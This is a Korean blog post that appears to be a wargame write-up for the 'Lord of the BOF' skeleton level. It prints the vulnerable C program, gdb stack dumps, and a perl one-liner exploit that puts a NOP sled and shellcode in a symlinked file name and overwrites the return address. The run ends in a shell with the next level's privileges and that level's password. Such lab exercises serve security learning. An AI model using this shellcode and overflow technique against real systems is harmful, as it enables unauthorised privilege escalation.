[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i, saved_argc;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc;
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}
풀다가 당황했다...
0xbfffffdf: ""
0xbfffffe0: ""
0xbfffffe1: ""
0xbfffffe2: ""
0xbfffffe3: ""
0xbfffffe4: ""
0xbfffffe5: ""
0xbfffffe6: "/home/vampire/tmp/vul"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
심볼릭 링크를 이용하면 될듯하다.
0xbfffffe7: "/home/vampire/tmp/sa"
0xbffffffc: ""
0xbfffffe7: 0x6d6f682f 0x61762f65 0x7269706d 0x6d742f65
0xbffffff7: 0x61732f70 0x00000000 Cannot access memory at address 0xbfffffff
(gdb) x/s 0xbfffffe7
0xbfffffe7: "/home/vampire/tmp/sa"
(gdb)
0xbffffb45:0xbffffef8:
0xbfffff48
0xbffffa48: 0x6d6f682f 0x61762f65 0x7269706d 0x6d742f65
0xbffffa58: 0x2f2e2f70 0x90909090 0x90909090 0x90909090
0xbffffa68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb18: 0x90909090 0x90909090 0x90909090 0xcee28a68
0xbffffb28: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901
0xbffffb38: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79
0xbffffb48: 0x00c354e1 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb58: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb68: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb78: 0xbfbfbfbf 0x00000000 0x00000000 0x00000000
0xbffffb88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef8: "/home/vampire/tmp/./", '\220' <repeats 180 times>...
0xbfffffc0: '\220' <repeats 20 times>, "h\212aI\201h±\fSThjo\212ah\001i0chi0tij\024Yþ\f\fIyuA÷aTA"
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿8yy¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
golem -> darkknight (0) | 2014.02.20 |
---|---|
skeleton -> golem (0) | 2014.02.20 |
troll -> vampire (0) | 2014.02.20 |
orge -> troll (0) | 2014.02.20 |
darkelf->orge (0) | 2014.02.20 |